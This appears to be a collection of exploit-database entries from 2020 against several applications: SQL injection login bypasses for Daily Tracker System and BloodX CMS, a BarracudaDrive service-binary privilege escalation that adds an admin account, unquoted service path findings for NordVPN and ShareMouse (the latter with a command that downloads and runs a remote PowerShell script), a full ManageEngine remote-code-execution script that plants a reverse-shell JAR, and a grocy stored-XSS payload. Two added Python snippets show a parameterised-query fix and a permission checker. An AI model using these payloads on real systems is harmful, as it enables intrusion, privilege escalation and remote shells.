
# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# CVE ID: CVE-2020-24193
# Date: September 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4

# Vulnerable Source Code (index.php)

<?php
if(isset($_POST['login']))
{
    $email=$_POST['email'];
    $password=md5($_POST['password']);
    // $email is concatenated straight into the SQL text: this is the injection point
    $query=mysqli_query($con,"select ID from tbluser where  Email='$email' && Password='$password' ");
    $ret=mysqli_fetch_array($query);
    if($ret>0){
        $_SESSION['detsuid']=$ret['ID'];
        header('location:dashboard.php');
    }
    else{
        $msg="Invalid Details.";
    }
}
?>


# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1

email='+or+1%3d1+--+hyd3sec&password=badPass&login=login
            
# Exploit Title: BloodX CMS 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-09-02
# Exploit Author: BKpatron
# Vendor Homepage: https://github.com/diveshlunker/BloodX
# Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com

# Vulnerability: An attacker can bypass the login page and reach the dashboard page
# vulnerable file : login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/BloodX-master/login.php

POST /BloodX-master/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Referer: http://localhost/BloodX-master/login.php
Cookie: PHPSESSID=97vbf440gvh0fep3iuqusaqht
Connection: keep-alive
Upgrade-Insecure-Requests: 1

email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
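Both login bypasses above (Daily Tracker System's index.php and BloodX's login.php) are the same bug: the email field is pasted into the SQL text, so a quote in it rewrites the WHERE clause and the password check never applies. The following Python is an added example, not code from either project: it rebuilds the Daily Tracker query against an in-memory SQLite stand-in for tbluser (constructed data, MySQL's `&&` written as `AND`), runs the URL-decoded payload from the request above against the vulnerable and the parameterised version, and shows that real credentials still work after the fix. BloodX's `'=''or'` payload relies on MySQL evaluating `0=''` as true, which SQLite does not, so only the Daily Tracker payload is exercised here.

```python
import hashlib
import sqlite3

# Constructed stand-in for tbluser; like index.php, the stored value is md5(password).
USERS = [(1, "admin@example.com", "S3cretAdminPw"), (2, "bob@example.com", "hunter2")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tbluser (ID INTEGER PRIMARY KEY, Email TEXT, Password TEXT)")
    for uid, email, pw in USERS:
        con.execute("INSERT INTO tbluser VALUES (?, ?, ?)",
                    (uid, email, hashlib.md5(pw.encode()).hexdigest()))
    con.commit()
    return con


def login_vulnerable(con, email, password):
    """Same construction as index.php: the email value becomes part of the SQL text."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = f"select ID from tbluser where Email='{email}' AND Password='{pw_hash}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(con, email, password):
    """The fix: bound parameters, so no value can change the structure of the query."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = con.execute("select ID from tbluser where Email=? AND Password=?",
                      (email, pw_hash)).fetchone()
    return row[0] if row else None


# URL-decoded email parameter from the Daily Tracker request above:
# the quote closes the literal, "or 1=1" makes the clause true, "--" comments out the password check.
BYPASS_EMAIL = "' or 1=1 -- hyd3sec"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass payload:", login_vulnerable(db, BYPASS_EMAIL, "badPass"))  # 1 (first user)
    print("fixed, bypass payload:     ", login_fixed(db, BYPASS_EMAIL, "badPass"))       # None
    print("fixed, real credentials:   ", login_fixed(db, "bob@example.com", "hunter2"))  # 2
```

The vulnerable call returns the ID of the first row in the table, which is why such bypasses typically land the attacker in the first (usually administrative) account.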
            
# Exploit Title: BarracudaDrive v6.5 - Insecure Folder Permissions
# Exploit Author:  Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) 
# CVE ID: N/A
# Date: 2020-09-01
# Vendor Homepage: https://barracudaserver.com/
# Software Link:   https://download.cnet.com/BarracudaDrive/3001-18506_4-10723210.html
# Version:         v6.5
# Tested On:       Windows 10 Pro 
# CVSS Base Score: 8.8 | Impact Subscore: 6.0 | Exploitability Subscore: 2.0
#     CVSS Vector: AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
#         CWE-276: Incorrect Default Permissions
#         CWE-732: Incorrect Permission Assignment for Critical Resource
# Vulnerability Description:
#     Insecure file and folder permissions on the 'bd' service of Real Time Logic's BarracudaDrive v6.5
#   allow a local low-privilege attacker to escalate privileges to administrator by replacing the bd.exe
#   service binary and restarting the computer; the malicious binary is then executed as 'LocalSystem'
#   on the next startup.

## Insecure Folder Permission
C:\>cacls C:\bd
C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F
      NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
      BUILTIN\Users:(OI)(CI)(ID)R
      NT AUTHORITY\Authenticated Users:(ID)C
      NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

## Insecure File/Service Permission
C:\>cacls C:\bd\bd.exe
C:\bd\bd.exe BUILTIN\Administrators:(ID)F
             NT AUTHORITY\SYSTEM:(ID)F
             BUILTIN\Users:(ID)R
             NT AUTHORITY\Authenticated Users:(ID)C

C:\>sc qc bd
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: bd
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\bd\bd.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BarracudaDrive ( bd ) service
        DEPENDENCIES       : Tcpip
        SERVICE_START_NAME : LocalSystem

## Local Privilege Escalation Proof of Concept
#0.  Download & install 

#1.  Create low privileged user & change to the user
## As admin
C:\>net user lowpriv Password123! /add
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name                    lowpriv
Local Group Memberships      *Users
Global Group memberships     *None

#2.  Move the Service EXE to a new name
C:\bd>whoami
desktop\lowpriv
C:\bd>move bd.exe bd.service.exe
        1 file(s) moved.

#3.  Create malicious binary on kali linux
## Add Admin User C Code
   kali# cat addAdmin.c
   #include <stdlib.h>
   #include <windows.h>

   int main(void){
       // Runs as LocalSystem when the service starts, so both commands succeed
       system("net user boku mypassword /add");
       system("net localgroup Administrators boku /add");
       // Hand off to the renamed original binary so the service still comes up
       WinExec("C:\\bd\\bd.service.exe",0);
       return 0;
   }

## Compile Code
   kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o bd.exe

#4. Transfer created 'bd.exe' to the Windows Host 

#5. Move the created 'bd.exe' binary to the 'C:\bd\' Folder
C:\bd>move C:\Users\lowpriv\Downloads\bd.exe .

#6. Check that the exploit admin user doesn't exist yet
C:\bd>net user boku
The user name could not be found

#7. Reboot the Computer
C:\bd>shutdown /r

#8. Login & look at that new Admin
C:\Users\lowpriv>net user boku | findstr /i "Membership Name" | findstr /v "Full"
User name                    boku
Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
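The PoC above rests on two facts visible in the cacls and sc qc output: Authenticated Users hold Change (C) on both C:\bd and C:\bd\bd.exe, and the service runs as LocalSystem. The following Python is an added example (not part of the advisory or of BarracudaDrive) that turns that manual check into a triage script: it parses the listings copied from this page, flags write rights granted to principals every local account belongs to, and reports them together with the service account. The ACE regex is a heuristic written for the cacls output format shown here (upper-case domain, then account, flags and right); on a live host feed it the output of the same two commands.

```python
import ntpath
import re

# Listings copied from the cacls and sc qc output above (BarracudaDrive v6.5, 'bd' service).
CACLS_BD_DIR = r"""C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F
      NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
      BUILTIN\Users:(OI)(CI)(ID)R
      NT AUTHORITY\Authenticated Users:(ID)C
      NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
"""

CACLS_BD_EXE = r"""C:\bd\bd.exe BUILTIN\Administrators:(ID)F
             NT AUTHORITY\SYSTEM:(ID)F
             BUILTIN\Users:(ID)R
             NT AUTHORITY\Authenticated Users:(ID)C
"""

SC_QC_BD = r"""SERVICE_NAME: bd
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\bd\bd.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BarracudaDrive ( bd ) service
        DEPENDENCIES       : Tcpip
        SERVICE_START_NAME : LocalSystem
"""

# Principals every local account is a member of, and the cacls rights that let them modify an object.
LOW_PRIV = {r"BUILTIN\Users", r"NT AUTHORITY\Authenticated Users", "Everyone"}
WRITE_RIGHTS = {"F", "C", "W"}  # Full, Change, Write

# One cacls ACE: DOMAIN\account:(flag)(flag)...RIGHT. Anchored at the line end because cacls
# prints the object path in front of the first ACE. Heuristic: the domain part is upper-case.
ACE = re.compile(r"([A-Z][A-Z ]*\\[A-Za-z][A-Za-z ]*|Everyone):((?:\([A-Z]+\))*)([FCWRN])\s*$")


def parse_cacls(output):
    """Return (principal, set of flags, right) for each ACE in one cacls listing."""
    aces = []
    for line in output.splitlines():
        m = ACE.search(line)
        if m:
            principal, flags, right = m.groups()
            aces.append((principal, set(re.findall(r"\(([A-Z]+)\)", flags)), right))
    return aces


def low_priv_writable(output):
    """Low-privilege principals that can modify the listed object itself.

    Inherit-only (IO) entries apply to children created under the object, not to the
    object, so they are ignored here.
    """
    hits = {p for p, flags, right in parse_cacls(output)
            if p in LOW_PRIV and right in WRITE_RIGHTS and "IO" not in flags}
    return sorted(hits)


def parse_sc_qc(output):
    """Turn 'sc qc' output into a dict; the quotes sc prints around the image path are stripped."""
    cfg = {}
    for line in output.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            cfg[m.group(1)] = m.group(2).strip().strip('"')
    return cfg


def assess_service(sc_output, cacls_by_path):
    """Check the service binary and its directory; returns (service account, [(object, principals)])."""
    cfg = parse_sc_qc(sc_output)
    binary = cfg.get("BINARY_PATH_NAME", "")
    findings = []
    for obj in (binary, ntpath.dirname(binary)):
        who = low_priv_writable(cacls_by_path.get(obj, ""))
        if who:
            findings.append((obj, who))
    return cfg.get("SERVICE_START_NAME", ""), findings


if __name__ == "__main__":
    account, findings = assess_service(SC_QC_BD, {r"C:\bd\bd.exe": CACLS_BD_EXE, r"C:\bd": CACLS_BD_DIR})
    for obj, who in findings:
        print(f"{obj} is writable by {', '.join(who)}; service runs as {account}")
```

Either finding on its own is enough for the PoC: write access to the directory permits the rename of bd.exe, and write access to the file permits overwriting it in place.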
            
# Exploit Title: Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path
# Discovery Date: 2020-09-03
# Discovery by: chipo
# Vendor Homepage: https://nordvpn.com
# Software Link : https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe
# Tested Version: 6.31.13.0
# Tested on OS: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path

# Finding the Unquoted Service Path vulnerability:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "nordvpn" | findstr /i /v """

nordvpn-service    nordvpn-service    C:\Program Files\NordVPN\nordvpn-service.exe

# Service info:

C:\>sc qc nordvpn-service
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: nordvpn-service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NordVPN\nordvpn-service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : nordvpn-service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt to exploit this vulnerability could allow a local user to execute code during startup or reboot with the elevated privileges of the service (LocalSystem).
            
# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
# Discovery Date: 2020-09-08
# Discovery by: Alan Lacerda (alacerda)
# Vendor Homepage: https://www.sharemouse.com/
# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe
# Version: 5.0.43
# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041

PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing);
PS > Invoke-AllChecks

ServiceName   : ShareMouse Service
Path          : C:\Program Files (x86)\ShareMouse\smService.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath>

PS >  wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName
AcceptStop  DisplayName         PathName                                         StartName
TRUE        ShareMouse Service  C:\Program Files (x86)\ShareMouse\smService.exe  LocalSystem

#Exploit:
# A successful attempt requires the local user to be able to place their own executable at one of
# the paths the service control manager tries before the real one (here, at the system root:
# C:\Program.exe), undetected by the OS or other security software, where it could be executed
# during application startup or reboot. If successful, the local user's code would run with the
# elevated privileges of the service.
            
#!/usr/bin/python3

# Exploit Title: ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)
# Google Dork: None
# Date: 2020-09-04
# Exploit Author: Hodorsec
# Vendor Homepage: https://manageengine.co.uk
# Vendor Vulnerability Description: https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html
# Software Link: http://archives.manageengine.com/applications_manager/14720/
# Version: Until version 14720
# Tested on: version 12900 and version 14700
# CVE : CVE-2020-14008

# Summary:
# PoC showing that Java code in a user-supplied JAR, uploaded as the Oracle WebLogic client library the product uses to connect to WebLogic servers, is executed on the server
# Exploits the loadClass() and newInstance() calls made by "WeblogicReference" when a Credential Test is run for a new WebLogic monitor
# The Credential Test looks for an existing "weblogic.jar" under the working directory, loads it through a JarLoader and instantiates its "weblogic.jndi.Environment" class, so a JAR planted there runs attacker-controlled code

# Vulnerable code:
# Lines 129 - 207 in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java
# 129 /*     */   public static MBeanServer lookupMBeanServer(String hostname, String portString, String username, String password, int version) throws Exception {
# 130 /* 130 */     ClassLoader current = Thread.currentThread().getContextClassLoader();
# 131 /*     */     try {
# 132 /* 132 */       boolean setcredentials = false;
# 133 /* 133 */       String url = "t3://" + hostname + ":" + portString;
# 134 /* 134 */       JarLoader jarLoader = null;
# 135 /*     */       
# ....<SNIP>....
# 143 /*     */       }
# 144 /* 144 */       else if (version == 8)
# 145 /*     */       {
# 146 /* 146 */         if (new File("./../working/classes/weblogic/version8/weblogic.jar").exists())
# 147 /*     */         {
# 148 /*     */ 
# 149 /* 149 */           jarLoader = new JarLoader("." + File.separator + ".." + File.separator + "working" + File.separator + "classes" + File.separator + "weblogic" + File.separator + "version8" + File.separator + "weblogic.jar");
# 150 /*     */           
# ....<SNIP>....
# 170 /* 170 */       Thread.currentThread().setContextClassLoader(jarLoader);
# 171 /* 171 */       Class cls = jarLoader.loadClass("weblogic.jndi.Environment");
# 172 /* 172 */       Object env = cls.newInstance();

# Example call for MAM version 12900:
# $ python3 poc_mam_weblogic_upload_and_exec_jar.py https://192.168.252.12:8443 admin admin 192.168.252.14 6666
# [*] Visiting page to retrieve initial cookies...
# [*] Retrieving admin cookie...
# [*] Getting base directory of ManageEngine...
# [*] Found base directory: C:\Program Files (x86)\ManageEngine\AppManager12
# [*] Creating JAR file...
# Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
# Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
# added manifest
# adding: weblogic/jndi/Environment.class(in = 1844) (out= 1079)(deflated 41%)
# [*] Uploading JAR file...
# [*] Attempting to upload JAR directly to targeted Weblogic folder...
# [*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!
# [*] Running the Weblogic credentialtest which triggers the code in the JAR...
# [*] Check your shell...

# Function flow:
# 1. Get initial cookie
# 2. Get valid session cookie by logging in
# 3. Get base directory of installation
# 4. Generate a malicious JAR file
# 5. Attempt to directly upload JAR, if success, jump to 7
# 6. Create task with random ID to copy JAR file to expected Weblogic location
# 7. Execute task
# 8. Delete task for cleanup
# 9. Run the vulnerable credentialTest, using the malicious JAR

import requests
import urllib3
import shutil
import subprocess
import os
import sys
import random
import re
from lxml import html

# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy

# Disable cert warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set timeout
timeout = 10

# Handle CTRL-C
def keyboard_interrupt():
    """Handles keyboardinterrupt exceptions"""
    print("\n\n[*] User requested an interrupt, exiting...")
    exit(0)

# Custom headers
def http_headers():
    headers = {
        'User-Agent': 'Mozilla',
    }
    return headers

def get_initial_cookie(url,headers):
    print("[*] Visiting page to retrieve initial cookies...")
    target = url + "/index.do"
    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
    return r.cookies

def get_valid_cookie(url,headers,initial_cookies,usern,passw):
    print("[*] Retrieving admin cookie...")
    appl_cookie = "JSESSIONID_APM_9090"
    post_data = {'clienttype':'html',
                'webstart':'',
                'j_username':usern,
                'ScreenWidth':'1280',
                'ScreenHeight':'709',
                'username':usern,
                'j_password':passw,
                'submit':'Login'}
    target = url + "/j_security_check"
    r = requests.post(target,data=post_data,headers=headers,cookies=initial_cookies,timeout=timeout,verify=False)
    res = r.text
    if "Server responded in " in res:
        return r.cookies
    else:
        print("[!] No valid response from used session, exiting!\n")
        exit(-1)

def get_base_dir(url,headers,valid_cookie):
    print("[*] Getting base directory of ManageEngine...")
    target = url + "/common/serverinfo.do"
    params = {'service':'AppManager',
            'reqForAdminLayout':'true'}
    r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
    tree = html.fromstring(r.content)
    pathname = tree.xpath('//table[@class="lrbtborder"]/tr[6]/td[2]/@title')
    base_dir = pathname[0]
    print("[*] Found base directory: " + base_dir)
    return base_dir

def create_jar(command,jarname,revhost,revport):
    print("[*] Creating JAR file...")
    # Variables
    classname = "Environment"
    pkgname = "weblogic.jndi"
    fullname = pkgname + "." + classname
    manifest = "MANIFEST.MF"

    # Directory variables
    curdir = os.getcwd()
    metainf_dir = "META-INF"
    maindir = "weblogic"
    subdir = maindir + "/jndi"
    builddir = curdir + "/" + subdir

    # Check if directory exist, else create directory
    try:
        if os.path.isdir(builddir):
            pass
        else:
            os.makedirs(builddir)
    except OSError:
        print("[!] Error creating local directory \"" + builddir + "\", check permissions...")
        exit(-1)

    # Creating the text file using given parameters
    javafile = '''package ''' + pkgname + ''';
    
    import java.io.IOException;
    import java.io.InputStream;
    import java.io.OutputStream;
    import java.net.Socket;
    import java.util.concurrent.TimeUnit;
    
    public class ''' + classname + ''' {
      
      // This method is being called by lookupMBeanServer() in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java
      // Uses the jarLoader.loadClass() method to load and initiate a new instance via newInstance()
      public void setProviderUrl(String string) throws Exception {
        System.out.println("Hello from setProviderUrl()");
        connect();
      }
    
      // Normal main() entry
      public static void main(String args[]) throws Exception {
        System.out.println("Hello from main()");
        // Added delay to notice being called from main()
        TimeUnit.SECONDS.sleep(10);
        connect();
      }
    
      // Where the magic happens
      public static void connect() throws Exception {
        String host = "''' + revhost + '''";
        int port = ''' + str(revport) + ''';
        String[] cmd = {"''' + command + '''"};
    
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s=new Socket(host,port);
        InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
        OutputStream po=p.getOutputStream(),so=s.getOutputStream();
        while(!s.isClosed()) {
          while(pi.available()>0)
            so.write(pi.read());
          while(pe.available()>0)
            so.write(pe.read());
          while(si.available()>0)
            po.write(si.read());
          so.flush();
          po.flush();
          
          try {
            p.exitValue();
            break;
          }
          catch (Exception e){
          }
    
        };
        p.destroy();
        s.close();
      }
    
    }'''
    
    # Output file to desired directory
    os.chdir(builddir)
    print(javafile,file=open(classname + ".java","w"))

    # Go to previous directory to create JAR file
    os.chdir(curdir)

    # Create the compiled .class file
    cmdCompile = "javac --release 7 " + subdir + "/*.java"
    process = subprocess.call(cmdCompile,shell=True)
    
    # Creating Manifest file
    try:
        if os.path.isdir(metainf_dir):
            pass
        else:
            os.makedirs(metainf_dir)
    except OSError:
        print("[!] Error creating local directory \"" + metainf_dir + "\", check permissions...")
        exit(-1)
    print("Main-Class: " + fullname,file=open(metainf_dir + "/" + manifest,"w"))
    
    # Create JAR file
    cmdJar = "jar cmvf " + metainf_dir + "/" + manifest + " " + jarname + " " + subdir + "/*.class"
    process = subprocess.call(cmdJar,shell=True)

    # Cleanup directories
    try:
        shutil.rmtree(metainf_dir)
        shutil.rmtree(maindir)
    except:
        print("[!] Error while cleaning up directories.")
    return True

def upload_jar(url,headers,valid_cookie,jarname,rel_path):
    print("[*] Uploading JAR file...")
    target = url + "/Upload.do"
    path_normal = './'
    path_trav = rel_path
    jar = {'theFile':(jarname,open(jarname, 'rb'))}
    print("[*] Attempting to upload JAR directly to targeted Weblogic folder...")
    post_data = {'uploadDir':path_trav}
    r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False)
    res = r_upload.text
    if "successfully uploaded" not in res:
        print("[!] Failed to upload JAR directly, continue to add and execute job to move JAR...")
        post_data = {'uploadDir':path_normal}
        jar = {'theFile':(jarname,open(jarname, 'rb'))}
        r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False)
        return "normal_path"
    else:
        print("[*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!")
        return "trav_path"

def create_task(url,headers,valid_cookie,action_name,rel_path,work_dir):
    print("[*] Creating a task to move the JAR file to relative path: " + rel_path + "...")
    valid_resp = "Execute Program succesfully created."
    target = url + "/adminAction.do"
    post_data = {'actions':'/adminAction.do?method=showExecProgAction&haid=null',
                'method':'createExecProgAction',
                'id':'0',
                'displayname':action_name,
                'serversite':'local',
                'choosehost':'-2',
                'prompt':'$',
                'command':'move weblogic.jar ' + rel_path,
                'execProgExecDir':work_dir,
                'abortafter':'10',
                'cancel':'false'}
    r = requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
    res = r.text
    found_id = ""
    if action_name in res:
        tree = html.fromstring(r.content)
        actionurls = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/@onclick')
        actionnames = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/text()')

        # Match the created action's name to its row and pull the actionid out of the onclick handler
        for i, name in enumerate(actionnames):
            if action_name in name:
                found_id = re.search(".*actionid=(.+?)','", actionurls[i]).group(1)
                print("[*] Found actionname: " + action_name + " with found actionid " + found_id)
                break
        return found_id
    else:
        print("[!] Actionname not found. Task probably wasn't created, please check. Exiting.")
        exit(-1)

def exec_task(url,headers,valid_cookie,found_id):
    print("[*] Executing created task with id: " + found_id + " to copy JAR...")
    valid_resp = "has been successfully executed"
    target = url + "/common/executeScript.do"
    params = {'method':'testAction',
            'actionID':found_id,
            'haid':'null'}
    r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
    res = r.text
    if valid_resp in res:
        print("[*] Task " + found_id + " has been executed successfully")
    else:
        print("[!] Task not executed. Check requests, exiting...")
        exit(-1)
    return

def del_task(url,headers,valid_cookie,found_id):
    print("[*] Deleting created task as JAR has been copied...")
    target = url + "/adminAction.do"
    params = {'method':'deleteProgExecAction'}
    post_data = {'haid':'null',
                'headercheckbox':'on',
                'progcheckbox':found_id}
    r = requests.post(target,params=params,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)

def run_credtest(url,headers,valid_cookie):
    print("[*] Running the Weblogic credentialtest which triggers the code in the JAR...")
    target = url + "/testCredential.do"
    post_data = {'method':'testCredentialForConfMonitors',
                'serializedData':'url=/jsp/newConfType.jsp',
                'searchOptionValue':'',
                'query':'',
                'addtoha':'null',
                'resourceid':'',
                'montype':'WEBLOGIC:7001',
                'isAgentEnabled':'NO',
                'resourcename':'null',
                'isAgentAssociated':'false',
                'hideFieldsForIT360':'null',
                'childNodesForWDM':'[]',
                'csrfParam':'',
                'type':'WEBLOGIC:7001',
                'displayname':'test',
                'host':'localhost',
                'netmask':'255.255.255.0',
                'resolveDNS':'False',
                'port':'7001',
                'CredentialDetails':'nocm',
                'cmValue':'-1',
                'version':'WLS_8_1',
                'sslenabled':'False',
                'username':'test',
                'password':'test',
                'pollinterval':'5',
                'groupname':''}

    print("[*] Check your shell...")
    requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,verify=False)
    return

# Main
def main(argv):
    if len(sys.argv) == 6:
        url = sys.argv[1]
        usern = sys.argv[2]
        passw = sys.argv[3]
        revhost = sys.argv[4]
        revport = sys.argv[5]
    else:
        print("[*] Usage: " + sys.argv[0] + " <url> <username> <password> <reverse_shell_host> <reverse_shell_port>")
        print("[*] Example: " + sys.argv[0] + " https://192.168.252.12:8443 admin admin 192.168.252.14 6666\n")
        exit(0)

    # Do stuff
    try:
        # Set HTTP headers
        headers = http_headers()
        
        # Relative path to copy the malicious JAR file
        rel_path = "classes/weblogic/version8/"
        # Generate a random ID to use for the task name and task tracking
        random_id = str(random.randrange(0000,9999))
        # Action_name used for displaying actions in overview
        action_name = "move_weblogic_jar" + random_id
        # Working dir to append to base dir
        base_append = "\\working\\"
        # Name for JAR file to use  
        jarname = "weblogic.jar"
        # Command shell to use
        cmd = "cmd.exe"

        # Execute functions
        initial_cookies = get_initial_cookie(url,headers)
        valid_cookie = get_valid_cookie(url,headers,initial_cookies,usern,passw)
        work_dir = get_base_dir(url,headers,valid_cookie) + base_append
        create_jar(cmd,jarname,revhost,revport)
        status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path)

        # Check if JAR can be uploaded via Directory Traversal
        # If so, no need to add and exec actions; just run the credentialtest directly
        if status_jar == "trav_path":
            run_credtest(url,headers,valid_cookie)
        # Cannot be uploaded via Directory Traversal, add and exec actions to move JAR. Lastly, run the vulnerable credentialtest
        elif status_jar == "normal_path":
            found_id = create_task(url,headers,valid_cookie,action_name,rel_path,work_dir)
            exec_task(url,headers,valid_cookie,found_id)
            del_task(url,headers,valid_cookie,found_id)
            run_credtest(url,headers,valid_cookie)

    except requests.exceptions.Timeout:
        print("[!] Timeout error\n")
        exit(-1)
    except requests.exceptions.TooManyRedirects:
        print("[!] Too many redirects\n")
        exit(-1)
    except requests.exceptions.ConnectionError:
        print("[!] Not able to connect to URL\n")
        exit(-1)
    # HTTPError is a subclass of RequestException, so it has to be caught first
    except requests.exceptions.HTTPError as e:
        print("[!] Failed with HTTP error - " + str(e) + "\n")
        exit(-1)
    except requests.exceptions.RequestException as e:
        print("[!] " + str(e))
        exit(-1)
    except KeyboardInterrupt:
        keyboard_interrupt()

# If we were called as a program, go execute the main function.
if __name__ == "__main__":
    main(sys.argv[1:])
            
# Exploit Title: grocy 2.7.1 - Persistent Cross-Site Scripting
# Date: 2020-09-06
# Exploit Author: Mufaddal Masalawala
# Vendor Homepage: https://berrnd.de/
# Software Link: https://github.com/grocy/grocy
# Version: 2.7.1
# Tested on: Kali Linux 2020.3

# Proof Of Concept:

grocy household management solution v2.7.1 allows stored XSS and HTML
injection via the Create Shopping List module; the payload is rendered
when that shopping list is deleted.
To exploit this vulnerability:
1. Log in to the application
2. Go to the 'Shopping List' module
3. Click 'New Shopping List'
4. Enter the payload <marquee onstart=alert(document.cookie)> in the 'Name'
input field.
5. Click Save
6. Click 'Delete Shopping List'

# REQUEST -->
POST /api/objects/shopping_lists HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/shoppinglist/new
Content-type: application/json
Content-Length: 38
Connection: close
Cookie: grocy_session=GhIjKZyST7Qkx18Q97u9MaPM1LsMtBmcJ6I59gxTO3Ks4WJXUd

{"name":"<marquee onstart=alert(1)> "}

# RESPONSE -->
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 06 Sep 2020 12:53:13 GMT
Content-Type: application/json
Connection: close
